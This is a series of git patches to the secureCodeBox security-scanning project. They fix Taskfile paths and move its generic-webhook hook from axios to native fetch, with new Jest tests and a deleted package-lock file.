"devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" } } diff --git a/tests/integration/hooks/finding-post-processing.test.js b/hooks/finding-post-processing/integration-tests/finding-post-processing.test.js similarity index 71% rename from tests/integration/hooks/finding-post-processing.test.js rename to hooks/finding-post-processing/integration-tests/finding-post-processing.test.js index d31e0b007c..2889c3dc94 100644 --- a/tests/integration/hooks/finding-post-processing.test.js +++ b/hooks/finding-post-processing/integration-tests/finding-post-processing.test.js @@ -2,17 +2,15 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../helpers"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers"; test( - "Finding Post Processing after test-scan", + "finding-post-processing after test-scan", async () => { const { severities, count } = await scan( "finding-post-processing", "test-scan", - [], + ["placeholder"], 90, ); From 8c0a5174543f1de8757ca0e16cebe5fa6a034733 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 9 Jul 2025 16:26:42 +0200 Subject: [PATCH 105/137] Correct hook dir location for dependency install --- scanners/Taskfile.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index f1fd7da0f5..4dda53827d 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -85,9 +85,9 @@ tasks: test:setup:scanner-dir: internal: true status: - - "[ -d {{ .TASKFILE_DIR }}/../node_modules ] || false" + - "[ -d {{ .TASKFILE_DIR }}/node_modules ] || false" cmds: - - cd {{ .TASKFILE_DIR }}/../ && bun install + - cd {{ .TASKFILE_DIR }}/ && bun install test:setup:test-helpers: internal: true status: From ba8d0750bb11c0df4647f04098d19bf97530cb8f Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 9 Jul 2025 16:53:01 +0200 Subject: [PATCH 106/137] Skip integration tests if the hook has none --- hooks/Taskfile.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/hooks/Taskfile.yaml b/hooks/Taskfile.yaml index 0dd2fa8ed7..6308977df0 100644 --- a/hooks/Taskfile.yaml +++ b/hooks/Taskfile.yaml @@ -11,6 +11,8 @@ includes: vars: # addtional cli args to pass to the helm install command which installs the hook into the testing environment additionalHelmInstallArgsForHook: '{{ .additionalHelmInstallArgsForHook | default "" }}' + hasIntegrationTests: + sh: 'if [ -d "{{ .TASKFILE_DIR }}/{{ .hookName }}/integration-tests" ]; then echo "true"; else echo "false"; fi' env: IMG_TAG: sh: 'echo "sha-$(git rev-parse --short HEAD)"' @@ -111,7 +113,13 @@ tasks: pkill -f "kubectl proxy" - echo "Running integration tests for {{ .hookName }}" - - bun test {{ .TASKFILE_DIR }}/{{ .hookName }}/integration-tests/ + - |- + {{ if eq "true" .hasIntegrationTests -}} + bun test {{ .TASKFILE_DIR }}/{{ .hookName }}/integration-tests/ + {{ else -}} + echo "Hook has no integration-tests. Skipping." + {{ end -}} + test:helm: desc: Run helm tests for the {{ .hookName }} hook preconditions: From 6f5cad1686dfae3a569b36c1ae5c9718ba85af14 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 9 Jul 2025 16:55:57 +0200 Subject: [PATCH 107/137] Migrate generic webhook to esm --- .github/workflows/ci.yaml | 2 +- hooks/generic-webhook/Taskfile.yaml | 8 + hooks/generic-webhook/hook/Dockerfile | 7 - hooks/generic-webhook/hook/hook.js | 34 +- hooks/generic-webhook/hook/hook.test.js | 105 +- hooks/generic-webhook/hook/package-lock.json | 6366 ----------------- .../hook/package-lock.json.license | 3 - hooks/generic-webhook/hook/package.json | 45 - .../generic-webhook/hook/package.json.license | 3 - 9 files changed, 128 insertions(+), 6445 deletions(-) create mode 100644 hooks/generic-webhook/Taskfile.yaml delete mode 100644 hooks/generic-webhook/hook/package-lock.json delete mode 100644 hooks/generic-webhook/hook/package-lock.json.license delete mode 100644 hooks/generic-webhook/hook/package.json delete mode 100644 hooks/generic-webhook/hook/package.json.license diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 3fdf364fd1..c1861a1eae 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -574,7 +574,7 @@ jobs: matrix: hook: - cascading-scans - # - generic-webhook + - generic-webhook # - persistence-azure-monitor # - persistence-elastic # Fails on the CI due to insufficient cpu as mentioned in issue #1165 # - persistence-dependencytrack diff --git a/hooks/generic-webhook/Taskfile.yaml b/hooks/generic-webhook/Taskfile.yaml new file mode 100644 index 0000000000..ed64638a3b --- /dev/null +++ b/hooks/generic-webhook/Taskfile.yaml @@ -0,0 +1,8 @@ +version: "3" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: generic-webhook diff --git a/hooks/generic-webhook/hook/Dockerfile b/hooks/generic-webhook/hook/Dockerfile index dc64c7bf24..79b2354999 100644 --- a/hooks/generic-webhook/hook/Dockerfile +++ b/hooks/generic-webhook/hook/Dockerfile @@ -4,13 +4,6 @@ ARG namespace ARG baseImageTag -FROM node:22-alpine AS build -RUN mkdir -p /home/app -WORKDIR /home/app -COPY package.json package-lock.json ./ -RUN npm ci --omit=dev - FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ -COPY --from=build --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ COPY --chown=root:root --chmod=755 ./hook.js ./hook.js diff --git a/hooks/generic-webhook/hook/hook.js b/hooks/generic-webhook/hook/hook.js index af12fb7290..c4914d2d31 100644 --- a/hooks/generic-webhook/hook/hook.js +++ b/hooks/generic-webhook/hook/hook.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function handle({ +export async function handle({ getFindings, scan, webhookUrl = process.env["WEBHOOK_URL"], @@ -10,26 +10,30 @@ async function handle({ webhookPassword = process.env["WEBHOOK_PASSWORD"], webhookApikeyHeaderName = process.env["WEBHOOK_APIKEY_HEADER_NAME"], webhookApikeyHeaderValue = process.env["WEBHOOK_APIKEY_HEADER_VALUE"], - axios = require("axios"), }) { const findings = await getFindings(); console.log(`Sending ${findings.length} findings to ${webhookUrl}`); + const body = JSON.stringify({ scan, findings }); + const headers = { + 'Content-Type': 'application/json', + }; + if (webhookApikeyHeaderName && webhookApikeyHeaderValue) { - await axios.post( - webhookUrl, - { scan, findings }, - { headers: { [webhookApikeyHeaderName]: webhookApikeyHeaderValue } }, - ); + headers[webhookApikeyHeaderName] = webhookApikeyHeaderValue; } else if (webhookUser && webhookPassword) { - await axios.post( - webhookUrl, - { scan, findings }, - { auth: { username: webhookUser, password: webhookPassword } }, - ); - } else { - await axios.post(webhookUrl, { scan, findings }); + const credentials = Buffer.from(`${webhookUser}:${webhookPassword}`).toString('base64'); + headers['Authorization'] = `Basic ${credentials}`; + } + + const response = await fetch(webhookUrl, { + method: 'POST', + headers, + body, + }); + + if (!response.ok) { + throw new Error(`Webhook request failed with status ${response.status}: ${await response.text()}`); } } -module.exports.handle = handle; diff --git a/hooks/generic-webhook/hook/hook.test.js b/hooks/generic-webhook/hook/hook.test.js index 2e4c397ef5..eeaafc4e19 100644 --- a/hooks/generic-webhook/hook/hook.test.js +++ b/hooks/generic-webhook/hook/hook.test.js @@ -2,8 +2,16 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle } = require("./hook"); -const axios = jest.createMockFromModule("axios"); +import { handle } from "./hook"; + +// Mock global fetch +global.fetch = jest.fn(() => + Promise.resolve({ + ok: true, + status: 200, + text: () => Promise.resolve(''), + }) +); beforeEach(() => { jest.clearAllMocks(); @@ -30,10 +38,97 @@ test("should send a post request to the url when fired", async () => { const webhookUrl = "http://example.com/foo/bar"; - await handle({ getFindings, scan, webhookUrl, axios }); + await handle({ getFindings, scan, webhookUrl }); + + expect(fetch).toHaveBeenCalledWith(webhookUrl, { + method: 'POST', + headers: { + 'Content-Type': 'application/json', + }, + body: JSON.stringify({ + scan, + findings: [], + }), + }); +}); + +test("should include API key header when provided", async () => { + const findings = []; + const getFindings = async () => findings; + const scan = { metadata: { name: "test-scan" } }; + const webhookUrl = "http://example.com/webhook"; + const webhookApikeyHeaderName = "X-API-Key"; + const webhookApikeyHeaderValue = "secret-api-key"; - expect(axios.post).toBeCalledWith(webhookUrl, { + await handle({ + getFindings, scan, - findings: [], + webhookUrl, + webhookApikeyHeaderName, + webhookApikeyHeaderValue + }); + + expect(fetch).toHaveBeenCalledWith(webhookUrl, { + method: 'POST', + headers: { + 'Content-Type': 'application/json', + 'X-API-Key': 'secret-api-key', + }, + body: JSON.stringify({ + scan, + findings: [], + }), }); }); + +test("should include basic auth when username and password are provided", async () => { + const findings = []; + const getFindings = async () => findings; + const scan = { metadata: { name: "test-scan" } }; + const webhookUrl = "http://example.com/webhook"; + const webhookUser = "username"; + const webhookPassword = "password"; + + // Base64 encoding of "username:password" + const expectedAuthHeader = "Basic dXNlcm5hbWU6cGFzc3dvcmQ="; + + await handle({ + getFindings, + scan, + webhookUrl, + webhookUser, + webhookPassword + }); + + expect(fetch).toHaveBeenCalledWith(webhookUrl, { + method: 'POST', + headers: { + 'Content-Type': 'application/json', + 'Authorization': expectedAuthHeader, + }, + body: JSON.stringify({ + scan, + findings: [], + }), + }); +}); + +test("should throw an error when the response is not ok", async () => { + // Override the default mock to return a failed response + global.fetch.mockImplementationOnce(() => + Promise.resolve({ + ok: false, + status: 500, + text: () => Promise.resolve('Internal Server Error'), + }) + ); + + const findings = []; + const getFindings = async () => findings; + const scan = { metadata: { name: "test-scan" } }; + const webhookUrl = "http://example.com/webhook"; + + await expect(handle({ getFindings, scan, webhookUrl })) + .rejects + .toThrow('Webhook request failed with status 500: Internal Server Error'); +}); diff --git a/hooks/generic-webhook/hook/package-lock.json b/hooks/generic-webhook/hook/package-lock.json deleted file mode 100644 index a0df1b103a..0000000000 --- a/hooks/generic-webhook/hook/package-lock.json +++ /dev/null @@ -1,6366 +0,0 @@ -{ - "name": "@securecodebox/hook-generic-webhook", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/hook-generic-webhook", - "version": "1.0.0", - "license": "Apache-2.0", - "dependencies": { - "axios": "^1.6.0" - }, - "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/core/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "dependencies": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } 